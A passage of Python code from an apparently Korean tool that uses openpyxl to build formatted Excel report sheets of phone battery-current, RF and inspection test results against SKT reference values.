else:\n sheet_out[col + '37'] = self.check_empty(sheet_in[col + '29'].value)\n\n # sheet row 39~41 handle\n sheet_out['A39'] = '▣ WiFi 측정내역'\n sheet_out.merge_cells('A40:A41')\n sheet_out['A40'] = '차수'\n sheet_out.merge_cells('B40:B41')\n sheet_out['B40'] = '시료번호'\n sheet_out.merge_cells('C40:C41')\n sheet_out['C40'] = '베터리용량'\n sheet_out.merge_cells('D40:D41')\n sheet_out['D40'] = '측정채널'\n\n sheet_out.merge_cells('E40:F40')\n sheet_out['E40'] = sheet_in['E32'].value\n sheet_out.merge_cells('G40:H40')\n sheet_out['G40'] = sheet_in['G32'].value\n sheet_out.merge_cells('I40:J40')\n sheet_out['I40'] = sheet_in['I32'].value\n sheet_out.merge_cells('K40:L40')\n sheet_out['K40'] = sheet_in['K32'].value\n sheet_out.merge_cells('M40:N40')\n sheet_out['M40'] = sheet_in['M32'].value\n\n sheet_out.merge_cells('E41:F41')\n sheet_out['E41'] = sheet_in['E33'].value\n sheet_out.merge_cells('G41:H41')\n sheet_out['G41'] = sheet_in['G33'].value\n sheet_out.merge_cells('I41:J41')\n sheet_out['I41'] = sheet_in['I33'].value\n sheet_out.merge_cells('K41:L41')\n sheet_out['K41'] = sheet_in['K33'].value\n sheet_out.merge_cells('M41:N41')\n sheet_out['M41'] = sheet_in['M33'].value\n\n # sheet row 42~43 handle\n sheet_out.merge_cells('A42:D43')\n sheet_out['A42'] = 'SKT 기준'\n for col in ['E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N']:\n sheet_out[col + '42'] = sheet_in[col+'34'].value\n sheet_out[col + '43'] = sheet_in[col+'35'].value\n\n # sheet row 44~45 handle\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N']:\n\n if col in ['A', 'B', 'C', 'D']:\n sheet_out[col + '44'] = sheet_in[col + '12'].value\n sheet_out[col + '45'] = sheet_in[col + '13'].value\n else:\n # row 44\n if self.isNumber(sheet_in[col + '36'].value):\n sheet_out[col + '44'] = self.check_num(round(float(sheet_in[col + '36'].value), 2))\n else:\n sheet_out[col + '44'] = self.check_empty(sheet_in[col + '36'].value)\n # row 45\n if self.isNumber(sheet_in[col + '37'].value):\n sheet_out[col + '45'] = self.check_num(round(float(sheet_in[col + '37'].value), 2))\n else:\n sheet_out[col + '45'] = self.check_empty(sheet_in[col + '37'].value)\n\n # sheet row 47~49 handle\n sheet_out['A47'] = '▣ BlueTooth 측정내역'\n sheet_out.merge_cells('A48:A49')\n sheet_out['A48'] = '차수'\n sheet_out.merge_cells('B48:B49')\n sheet_out['B48'] = '시료번호'\n sheet_out.merge_cells('C48:C49')\n sheet_out['C48'] = '베터리용량'\n sheet_out.merge_cells('D48:D49')\n sheet_out['D48'] = '측정채널'\n sheet_out.merge_cells('E48:N48')\n sheet_out['E48'] = sheet_in['E40'].value\n\n sheet_out.merge_cells('E49:F49')\n sheet_out['E49'] = sheet_in['E41'].value\n sheet_out.merge_cells('G49:H49')\n sheet_out['G49'] = sheet_in['G41'].value\n sheet_out.merge_cells('I49:J49')\n sheet_out['I49'] = sheet_in['I41'].value\n sheet_out.merge_cells('K49:L49')\n sheet_out['K49'] = sheet_in['K41'].value\n sheet_out.merge_cells('M49:N49')\n sheet_out['M49'] = sheet_in['M41'].value\n\n # sheet row 50~51 handle\n sheet_out.merge_cells('A50:D51')\n sheet_out['A50'] = 'SKT 기준'\n\n for col in ['E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N']:\n sheet_out[col + '50'] = sheet_in[col+'42'].value\n sheet_out[col + '51'] = sheet_in[col+'43'].value\n\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N']:\n\n # sheet row 52~53 handle\n if col in ['A', 'B', 'C', 'D']:\n sheet_out[col + '52'] = sheet_in[col + '12'].value\n sheet_out[col + '53'] = sheet_in[col + '13'].value\n else:\n # row 52\n if self.isNumber(sheet_in[col + '44'].value):\n sheet_out[col + '52'] = 
self.check_num(round(float(sheet_in[col + '44'].value), 2))\n                        else:\n                            sheet_out[col + '52'] = self.check_empty(sheet_in[col + '44'].value)\n                        # row 53\n                        if self.isNumber(sheet_in[col + '45'].value):\n                            sheet_out[col + '53'] = self.check_num(round(float(sheet_in[col + '45'].value), 2))\n                        else:\n                            sheet_out[col + '53'] = self.check_empty(sheet_in[col + '45'].value)\n\n                self.setPrintText('/s {}번 파일 \"배터리소모전류 세부데이터\" 데이터 입력 완료 /e'.format(idx+1))\n\n                # set temp data\n                if self.opFlag:\n\n                    # all cell alignment adjust\n                    for mCell in sheet_out[\"A1:Z53\"]:\n                        for cell in mCell:\n                            cell.alignment = self.general_alignment\n                    # top alignment adjust\n                    sheet_out['A3'].alignment = self.top_alignment\n                    sheet_out['A17'].alignment = self.top_alignment\n                    sheet_out['A31'].alignment = self.top_alignment\n                    sheet_out['A39'].alignment = self.top_alignment\n                    sheet_out['A47'].alignment = self.top_alignment\n\n                    # all cell border adjust\n                    for mCell in sheet_out[\"A4:P15\"]:\n                        for cell in mCell:\n                            cell.border = self.thin_border\n                    for mCell in sheet_out[\"A18:P23\"]:\n                        for cell in mCell:\n                            cell.border = self.thin_border\n                    for mCell in sheet_out[\"A24:L29\"]:\n                        for cell in mCell:\n                            cell.border = self.thin_border\n                    for mCell in sheet_out[\"A32:L37\"]:\n                        for cell in mCell:\n                            cell.border = self.thin_border\n                    for mCell in sheet_out[\"A40:N45\"]:\n                        for cell in mCell:\n                            cell.border = self.thin_border\n                    for mCell in sheet_out[\"A48:N53\"]:\n                        for cell in mCell:\n                            cell.border = self.thin_border\n\n                    # all cell font adjust\n                    for mCell in sheet_out[\"A3:P53\"]:\n                        for cell in mCell:\n                            cell.font = self.index_font\n\n                    sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n                    # each column width adjust\n                    sheet_cell_list = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N',\n                                       'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\n                    sheet_width_list = [29.88, 11.38, 11.38, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11,\n                                        11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11]\n\n                    for i in range(len(sheet_cell_list)):\n                        sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n\n                    sheet_out.row_dimensions[1].height = 45\n\n                    # Set Pattern Fill\n                    for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P']:\n\n                        sheet_out[col + '4'].fill = self.brown_fill\n                        sheet_out[col + '5'].fill = self.brown_fill\n                        sheet_out[col + '6'].fill = self.apricot_fill\n                        sheet_out[col + '7'].fill = self.apricot_fill\n                        sheet_out[col + '10'].fill = self.brown_fill\n                        sheet_out[col + '11'].fill = self.brown_fill\n                        sheet_out[col + '12'].fill = self.apricot_fill\n                        sheet_out[col + '13'].fill = self.apricot_fill\n                        sheet_out[col + '18'].fill = self.brown_fill\n                        sheet_out[col + '19'].fill = self.brown_fill\n                        sheet_out[col + '20'].fill = self.apricot_fill\n                        sheet_out[col + '21'].fill = self.apricot_fill\n\n                    for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N']:\n\n                        sheet_out[col + '40'].fill = self.brown_fill\n                        sheet_out[col + '41'].fill = self.brown_fill\n                        sheet_out[col + '42'].fill = self.apricot_fill\n                        sheet_out[col + '43'].fill = self.apricot_fill\n                        sheet_out[col + '48'].fill = self.brown_fill\n                        sheet_out[col + '49'].fill = self.brown_fill\n                        sheet_out[col + '50'].fill = self.apricot_fill\n                        sheet_out[col + '51'].fill = self.apricot_fill\n\n                    for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L']:\n\n                        sheet_out[col + '24'].fill = self.brown_fill\n                        sheet_out[col + '25'].fill = self.brown_fill\n                        sheet_out[col + '26'].fill = self.apricot_fill\n                        
sheet_out[col + '27'].fill = self.apricot_fill\n sheet_out[col + '32'].fill = self.brown_fill\n sheet_out[col + '33'].fill = self.brown_fill\n sheet_out[col + '34'].fill = self.apricot_fill\n sheet_out[col + '35'].fill = self.apricot_fill\n\n for i in [8, 9, 14, 15, 22, 23, 28, 29, 36, 37, 44, 45, 52, 53]:\n\n sheet_out['A' + str(i)].fill = self.gray_fill\n sheet_out['B' + str(i)].fill = self.gray_fill\n sheet_out['C' + str(i)].fill = self.gray_fill\n sheet_out['D' + str(i)].fill = self.gray_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"배터리소모전류 세부데이터\" 시트 스타일 적용 완료 /e'.format(idx+1))\n\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # 베터리소모전류(시간) Tab\n def time_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_out_files):\n\n wb_output = openpyxl.load_workbook(item, data_only=True)\n\n # get data from wb_input\n sheet_in = wb_output['배터리소모전류 세부데이터']\n #option setting wb.output\n sheet_out = wb_output['배터리소모전류(시간)']\n target = sheet_in['A8'].value\n ref = sheet_in['A9'].value\n\n # sheet row 1 handle\n sheet_out.merge_cells('A1:H1')\n sheet_out['A1'] = '배터리소모전류 결과 (시간)'\n # sheet row 3~5 handle\n sheet_out['A3'] = '▣ 5G '\n sheet_out.merge_cells('A4:A5')\n sheet_out['A4'] = '구분'\n sheet_out.merge_cells('B4:C4')\n sheet_out['B4'] = sheet_in['E4'].value\n sheet_out.merge_cells('D4:E4')\n sheet_out['D4'] = sheet_in['I4'].value\n sheet_out.merge_cells('F4:H4')\n sheet_out['F4'] = sheet_in['M4'].value\n\n sheet_out['B5'] = sheet_in['E5'].value\n sheet_out['C5'] = sheet_in['G5'].value\n sheet_out['D5'] = sheet_in['I5'].value\n sheet_out['E5'] = sheet_in['K5'].value\n sheet_out['F5'] = sheet_in['M5'].value\n sheet_out['G5'] = sheet_in['O5'].value\n sheet_out['H5'] = sheet_in['G11'].value\n\n # sheet row 6 handle\n sheet_out['A6'] = 'SKT 기준'\n sheet_out['B6'] = sheet_in['F6'].value\n sheet_out['C6'] = sheet_in['H6'].value\n sheet_out['D6'] = sheet_in['J6'].value\n sheet_out['E6'] = sheet_in['L6'].value\n sheet_out['F6'] = sheet_in['N6'].value\n sheet_out['G6'] = sheet_in['P6'].value\n sheet_out['H6'] = sheet_in['H12'].value\n\n # sheet row 7~8\n sheet_out['A7'] = target\n sheet_out['B7'] = sheet_in['F8'].value\n sheet_out['C7'] = sheet_in['H8'].value\n sheet_out['D7'] = sheet_in['J8'].value\n sheet_out['E7'] = sheet_in['L8'].value\n sheet_out['F7'] = sheet_in['N8'].value\n sheet_out['G7'] = sheet_in['P8'].value\n sheet_out['H7'] = sheet_in['H14'].value\n sheet_out['A8'] = ref\n sheet_out['B8'] = sheet_in['F9'].value\n sheet_out['C8'] = sheet_in['H9'].value\n sheet_out['D8'] = sheet_in['J9'].value\n sheet_out['E8'] = sheet_in['L9'].value\n sheet_out['F8'] = sheet_in['N9'].value\n sheet_out['G8'] = sheet_in['P9'].value\n sheet_out['H8'] = sheet_in['H15'].value\n\n # sheet row 9~10\n sheet_out.merge_cells('A9:A10')\n sheet_out['A9'] = '구분'\n sheet_out['B9'] = sheet_in['I10'].value\n sheet_out['C9'] = sheet_in['K10'].value\n sheet_out['D9'] = sheet_in['M10'].value\n sheet_out['E9'] = '동영상'\n sheet_out['F9'] = sheet_in['E10'].value\n\n sheet_out['B10'] = sheet_in['I11'].value\n sheet_out['C10'] = sheet_in['K11'].value\n sheet_out['D10'] = sheet_in['M11'].value\n sheet_out['E10'] = '녹화'\n sheet_out['F10'] = sheet_in['E11'].value\n\n # sheet row 11 handle\n sheet_out['A11'] = 'SKT 기준'\n sheet_out['B11'] = sheet_in['J12'].value\n sheet_out['C11'] = 
sheet_in['L12'].value\n sheet_out['D11'] = sheet_in['N12'].value\n sheet_out['E11'] = sheet_in['P12'].value\n sheet_out['F11'] = sheet_in['F12'].value\n\n # sheet row 12~13\n sheet_out['A12'] = target\n sheet_out['B12'] = sheet_in['J14'].value\n sheet_out['C12'] = sheet_in['L14'].value\n sheet_out['D12'] = sheet_in['N14'].value\n sheet_out['E12'] = sheet_in['P14'].value\n sheet_out['F12'] = sheet_in['F14'].value\n sheet_out['A13'] = ref\n sheet_out['B13'] = sheet_in['F15'].value\n sheet_out['C13'] = sheet_in['H15'].value\n sheet_out['D13'] = sheet_in['J15'].value\n sheet_out['E13'] = sheet_in['L15'].value\n sheet_out['F13'] = sheet_in['N15'].value\n\n # sheet row 15~17 handle\n sheet_out['A15'] = '▣ LTE'\n sheet_out.merge_cells('A16:A17')\n sheet_out['A16'] = '구분'\n sheet_out.merge_cells('B16:C16')\n sheet_out['B16'] = sheet_in['E18'].value\n sheet_out.merge_cells('D16:E16')\n sheet_out['D16'] = sheet_in['I18'].value\n sheet_out.merge_cells('F16:H16')\n sheet_out['F16'] = sheet_in['M18'].value\n\n sheet_out['B17'] = sheet_in['E19'].value\n sheet_out['C17'] = sheet_in['G19'].value\n sheet_out['D17'] = sheet_in['I19'].value\n sheet_out['E17'] = sheet_in['K19'].value\n sheet_out['F17'] = sheet_in['M19'].value\n sheet_out['G17'] = sheet_in['O19'].value\n sheet_out['H17'] = sheet_in['E25'].value\n\n # sheet row 18 handle\n sheet_out['A18'] = 'SKT 기준'\n sheet_out['B18'] = sheet_in['F20'].value\n sheet_out['C18'] = sheet_in['H20'].value\n sheet_out['D18'] = sheet_in['J20'].value\n sheet_out['E18'] = sheet_in['L20'].value\n sheet_out['F18'] = sheet_in['N20'].value\n sheet_out['G18'] = sheet_in['P20'].value\n sheet_out['H18'] = sheet_in['F26'].value\n\n # sheet row 19~20\n sheet_out['A19'] = target\n sheet_out['B19'] = sheet_in['F22'].value\n sheet_out['C19'] = sheet_in['H22'].value\n sheet_out['D19'] = sheet_in['J22'].value\n sheet_out['E19'] = sheet_in['L22'].value\n sheet_out['F19'] = sheet_in['N22'].value\n sheet_out['G19'] = sheet_in['P22'].value\n sheet_out['H19'] = sheet_in['F28'].value\n sheet_out['A20'] = ref\n sheet_out['B20'] = sheet_in['F23'].value\n sheet_out['C20'] = sheet_in['H23'].value\n sheet_out['D20'] = sheet_in['J23'].value\n sheet_out['E20'] = sheet_in['L23'].value\n sheet_out['F20'] = sheet_in['N23'].value\n sheet_out['G20'] = sheet_in['P23'].value\n sheet_out['H20'] = sheet_in['F29'].value\n\n # sheet row 21~22\n sheet_out.merge_cells('A21:A22')\n sheet_out['A21'] = '구분'\n sheet_out['B21'] = sheet_in['G24'].value\n sheet_out['C21'] = sheet_in['I24'].value\n sheet_out['D21'] = sheet_in['K24'].value\n\n sheet_out['B22'] = sheet_in['G25'].value\n sheet_out['C22'] = sheet_in['I25'].value\n sheet_out['D22'] = sheet_in['K25'].value\n\n # sheet row 23 handle\n sheet_out['A23'] = 'SKT 기준'\n sheet_out['B23'] = sheet_in['H26'].value\n sheet_out['C23'] = sheet_in['J26'].value\n sheet_out['D23'] = sheet_in['L26'].value\n\n # sheet row 24~25\n sheet_out['A24'] = target\n sheet_out['B24'] = sheet_in['H28'].value\n sheet_out['C24'] = sheet_in['J28'].value\n sheet_out['D24'] = sheet_in['L28'].value\n sheet_out['A25'] = ref\n sheet_out['B25'] = sheet_in['H29'].value\n sheet_out['C25'] = sheet_in['J29'].value\n sheet_out['D25'] = sheet_in['L29'].value\n\n # sheet row 27~29 handle\n sheet_out['A27'] = '▣ WCDMA'\n sheet_out.merge_cells('A28:A29')\n sheet_out['A28'] = '구분'\n sheet_out['B28'] = sheet_in['E32'].value\n sheet_out.merge_cells('C28:D28')\n sheet_out['C28'] = sheet_in['G32'].value\n sheet_out['E28'] = sheet_in['K32'].value\n\n sheet_out['B29'] = sheet_in['E33'].value\n 
sheet_out['C29'] = sheet_in['G33'].value\n                sheet_out['D29'] = sheet_in['I33'].value\n                sheet_out['E29'] = sheet_in['K33'].value\n\n                # sheet row 30 handle\n                sheet_out['A30'] = 'SKT 기준'\n                sheet_out['B30'] = sheet_in['F34'].value\n                sheet_out['C30'] = sheet_in['H34'].value\n                sheet_out['D30'] = sheet_in['J34'].value\n                sheet_out['E30'] = sheet_in['L34'].value\n\n                # sheet row 31~32\n                sheet_out['A31'] = target\n                sheet_out['B31'] = sheet_in['F36'].value\n                sheet_out['C31'] = sheet_in['H36'].value\n                sheet_out['D31'] = sheet_in['J36'].value\n                sheet_out['E31'] = sheet_in['L36'].value\n                sheet_out['A32'] = ref\n                sheet_out['B32'] = sheet_in['F37'].value\n                sheet_out['C32'] = sheet_in['H37'].value\n                sheet_out['D32'] = sheet_in['J37'].value\n                sheet_out['E32'] = sheet_in['L37'].value\n\n\n                # sheet row 34~36 handle\n                sheet_out['A34'] = '▣ WiFi'\n                sheet_out.merge_cells('A35:A36')\n                sheet_out['A35'] = '구분'\n                sheet_out.merge_cells('B35:C35')\n                sheet_out['B35'] = sheet_in['E40'].value\n                sheet_out['D35'] = sheet_in['I40'].value\n                sheet_out['E35'] = sheet_in['K40'].value\n                sheet_out['F35'] = sheet_in['M40'].value\n\n                sheet_out['B36'] = sheet_in['E41'].value\n                sheet_out['C36'] = sheet_in['G41'].value\n                sheet_out['D36'] = sheet_in['I41'].value\n                sheet_out['E36'] = sheet_in['K41'].value\n                sheet_out['F36'] = sheet_in['M41'].value\n\n                # sheet row 37 handle\n                sheet_out['A37'] = 'SKT 기준'\n                sheet_out['B37'] = sheet_in['F42'].value\n                sheet_out['C37'] = sheet_in['H42'].value\n                sheet_out['D37'] = sheet_in['J42'].value\n                sheet_out['E37'] = sheet_in['L42'].value\n                sheet_out['F37'] = sheet_in['N42'].value\n\n                # sheet row 38~39\n                sheet_out['A38'] = target\n                sheet_out['B38'] = sheet_in['F44'].value\n                sheet_out['C38'] = sheet_in['H44'].value\n                sheet_out['D38'] = sheet_in['J44'].value\n                sheet_out['E38'] = sheet_in['L44'].value\n                sheet_out['F38'] = sheet_in['N44'].value\n                sheet_out['A39'] = ref\n                sheet_out['B39'] = sheet_in['F45'].value\n                sheet_out['C39'] = sheet_in['H45'].value\n                sheet_out['D39'] = sheet_in['J45'].value\n                sheet_out['E39'] = sheet_in['L45'].value\n                sheet_out['F39'] = sheet_in['N45'].value\n\n                # sheet row 41~43 handle\n                sheet_out['A41'] = '▣ Bluetooth'\n                sheet_out.merge_cells('A42:A43')\n                sheet_out['A42'] = '구분'\n                sheet_out.merge_cells('B42:F42')\n                sheet_out['B42'] = sheet_in['E48'].value\n\n                sheet_out['B43'] = sheet_in['E49'].value\n                sheet_out['C43'] = sheet_in['G49'].value\n                sheet_out['D43'] = sheet_in['I49'].value\n                sheet_out['E43'] = sheet_in['K49'].value\n                sheet_out['F43'] = sheet_in['M49'].value\n\n                # sheet row 44 handle\n                sheet_out['A44'] = 'SKT 기준'\n                sheet_out['B44'] = sheet_in['F50'].value\n                sheet_out['C44'] = sheet_in['H50'].value\n                sheet_out['D44'] = sheet_in['J50'].value\n                sheet_out['E44'] = sheet_in['L50'].value\n                sheet_out['F44'] = sheet_in['N50'].value\n\n                # sheet row 45~46\n                sheet_out['A45'] = target\n                sheet_out['B45'] = sheet_in['F52'].value\n                sheet_out['C45'] = sheet_in['H52'].value\n                sheet_out['D45'] = sheet_in['J52'].value\n                sheet_out['E45'] = sheet_in['L52'].value\n                sheet_out['F45'] = sheet_in['N52'].value\n                sheet_out['A46'] = ref\n                sheet_out['B46'] = sheet_in['F53'].value\n                sheet_out['C46'] = sheet_in['H53'].value\n                sheet_out['D46'] = sheet_in['J53'].value\n                sheet_out['E46'] = sheet_in['L53'].value\n                sheet_out['F46'] = sheet_in['N53'].value\n\n                self.setPrintText('/s {}번 파일 \"배터리소모전류 결과 (시간)\" 데이터 입력 완료 /e'.format(idx+1))\n\n                # set temp data\n                if self.opFlag:\n\n                    # all cell alignment adjust\n                    for mCell in sheet_out[\"A1:H46\"]:\n                        for cell in mCell:\n                            cell.alignment = self.general_alignment\n\n                    # top 
alignment adjust\n sheet_out['A3'].alignment = self.top_alignment\n sheet_out['A15'].alignment = self.top_alignment\n sheet_out['A27'].alignment = self.top_alignment\n sheet_out['A34'].alignment = self.top_alignment\n sheet_out['A41'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A4:H8\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A9:F13\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A16:H20\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A21:D25\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A28:E32\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A35:F39\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A42:F46\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A3:H46\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H']\n sheet_width_list = [29.88, 13.38, 13.38, 13.38, 13.38, 13.38, 13.38, 13.38]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H']:\n\n sheet_out[col + '4'].fill = self.brown_fill\n sheet_out[col + '5'].fill = self.brown_fill\n sheet_out[col + '6'].fill = self.apricot_fill\n sheet_out[col + '16'].fill = self.brown_fill\n sheet_out[col + '17'].fill = self.brown_fill\n sheet_out[col + '18'].fill = self.apricot_fill\n\n for col in ['A', 'B', 'C', 'D', 'E', 'F']:\n\n sheet_out[col + '9'].fill = self.brown_fill\n sheet_out[col + '10'].fill = self.brown_fill\n sheet_out[col + '11'].fill = self.apricot_fill\n sheet_out[col + '35'].fill = self.brown_fill\n sheet_out[col + '36'].fill = self.brown_fill\n sheet_out[col + '37'].fill = self.apricot_fill\n sheet_out[col + '42'].fill = self.brown_fill\n sheet_out[col + '43'].fill = self.brown_fill\n sheet_out[col + '44'].fill = self.apricot_fill\n\n for col in ['A', 'B', 'C', 'D', 'E']:\n\n sheet_out[col + '28'].fill = self.brown_fill\n sheet_out[col + '29'].fill = self.brown_fill\n sheet_out[col + '30'].fill = self.apricot_fill\n\n\n for col in ['A', 'B', 'C', 'D']:\n\n sheet_out[col + '21'].fill = self.brown_fill\n sheet_out[col + '22'].fill = self.brown_fill\n sheet_out[col + '23'].fill = self.apricot_fill\n\n for i in [7, 8, 12, 13, 19, 20, 24, 25, 31, 32, 38, 39, 45, 46]:\n\n sheet_out['A' + str(i)].fill = self.gray_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"배터리소모전류 결과 (시간)\" 시트 스타일 적용 완료 /e'.format(idx+1))\n\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # 첨부 1 측정기준 Tab\n def attach_generate_data_1(self):\n\n try:\n for idx, item in enumerate(self.list_out_files):\n\n wb_output = openpyxl.load_workbook(item)\n # option setting wb.output\n sheet_out = wb_output['첨부1. 
측정기준 및 가점']\n list_band = ['Band 1 15M', 'Band 3 20M', 'Band 5 10M',\n 'Band 7 20M', 'Band 7 10M']\n list_trp_base = ['14.00dBm', '15.00dBm', '13.50dBm',\n '13.00dBm', '13.00dBm']\n list_tis_base = ['-92.00dBm', '-91.00dBm', '-87.00dBm',\n '-90.00dBm', '-93.00dBm']\n\n # sheet row 1 handle\n sheet_out.merge_cells('A1:D1')\n sheet_out['A1'] = '첨부1. 측정기준 및 가점'\n\n # sheet row 3 handle\n sheet_out['A3'] = '▣ RF 성능 : 기 출시 단말 측정하여 상위 70% 수준으로 설정'\n sheet_out['A4'] = ' -TRP'\n\n # 5~10 row\n sheet_out['A5'] = 'SISO LTE'\n sheet_out['B5'] = '기준(RHP)'\n sheet_out.merge_cells('C5:D5')\n sheet_out['C5'] = '측정기준 History'\n\n for i in range(6, 11):\n sheet_out['A' + str(i)] = list_band[i - 6]\n sheet_out['B' + str(i)] = list_trp_base[i - 6]\n sheet_out.merge_cells('C6:D10')\n sheet_out['C6'] = '기준대비 1dB 증가후 +1점/1dBm 가점\\n기준대비 1dB 저하후 - 1점/1dBm 감점'\n # 11~17 row\n sheet_out['A11'] = ' -TIS (SISO LTE)'\n\n # 12~17 row\n sheet_out['A12'] = 'SISO LTE'\n sheet_out['B12'] = '기준(RHP)'\n sheet_out.merge_cells('C12:D12')\n sheet_out['C12'] = '측정기준 History'\n\n for i in range(13, 18):\n sheet_out['A' + str(i)] = list_band[i - 13]\n sheet_out['B' + str(i)] = list_trp_base[i - 13]\n sheet_out.merge_cells('C13:D17')\n sheet_out['C13'] = '기준대비 1dB 증가후 +1점/3dBm 가점\\n기준대비 1dB 저하후 - 1점/3dBm 감점'\n\n # 19~25 row\n sheet_out['A19'] = '▣ 배터리 소모전류'\n sheet_out.merge_cells('A20:D20')\n sheet_out['A20'] = \" - '18.1 ~ '19.8 납품검사 삼성/LG 단말 29종으로\\n측정 기준으로 소모전류 (평균+STD), 배터리 용량 (3000mA) 산출\"\n sheet_out.merge_cells('A21:D21')\n sheet_out['A21'] = \" - Ref. 단말 대비 10% 이내 (측정기준부재항목)\"\n\n sheet_out['A23'] = '▣ MOS'\n sheet_out.merge_cells('A24:D24')\n sheet_out['A24'] = \" - ITU-T 권고 P.800 항목에 규정 참고 (LTE : 3.5, WCDMA : 3.0)\"\n sheet_out.merge_cells('A25:D25')\n sheet_out['A25'] = '. MOS 3.5~4 : 자연스러운 통화 수준\\n. 
MOS 3~3.5 : 대화는 잘 이루어지지만 품질저하 느낄 수 있음'\n\n self.setPrintText('/s {}번 파일 \"첨부1\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:D25\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n\n # top alignment adjust\n sheet_out['A3'].alignment = self.top_alignment\n sheet_out['A4'].alignment = self.top_alignment\n sheet_out['C6'].alignment = self.top_alignment_3\n sheet_out['A11'].alignment = self.top_alignment\n sheet_out['C13'].alignment = self.top_alignment_3\n sheet_out['A19'].alignment = self.top_alignment\n sheet_out['A20'].alignment = self.top_alignment_3\n sheet_out['A21'].alignment = self.top_alignment\n sheet_out['A23'].alignment = self.top_alignment\n sheet_out['A24'].alignment = self.top_alignment\n sheet_out['A25'].alignment = self.top_alignment_3\n\n # all cell border adjust\n for mCell in sheet_out[\"A5:D10\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n for mCell in sheet_out[\"A12:D17\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A2:D25\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D']\n sheet_width_list = [25, 15.88, 17, 17]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n sheet_out.row_dimensions[20].height = 45\n sheet_out.row_dimensions[25].height = 45\n\n # Set Pattern Fill\n for i in [5, 12]:\n sheet_out['A' + str(i)].fill = self.brown_fill\n sheet_out['B' + str(i)].fill = self.brown_fill\n sheet_out['C' + str(i)].fill = self.brown_fill\n sheet_out['D' + str(i)].fill = self.brown_fill\n\n for i in [5, 6, 7, 8, 9, 10, 13, 14, 15, 16, 17]:\n sheet_out['A' + str(i)].fill = self.gray_fill\n sheet_out['B' + str(i)].fill = self.apricot_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"첨부1\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # 첨부 2 측정기준 Tab\n def attach_generate_data_2(self):\n\n try:\n for idx, item in enumerate(self.list_out_files):\n\n wb_output = openpyxl.load_workbook(item)\n # option setting wb.output\n sheet_out = wb_output['첨부2. 납품검사']\n list_items = ['고온 고습/저온 Cycling 시험\t', '낙하시험', '방수시험', 'ESD (정전기) 시험',\n '개통 및 사용성 시험', 'RF Auto (50대, 제조사 자체 측정)', 'CATS_Priority1 (제조사 자체 측정)',\n 'GPS (제조사 자체 측정)', '발열 (제조사 자체 측정)', '카메라 전.후면 화질평가 (제조사 자체 측정)',\n 'WiFi 무선성능(제조사 자체 측정)', 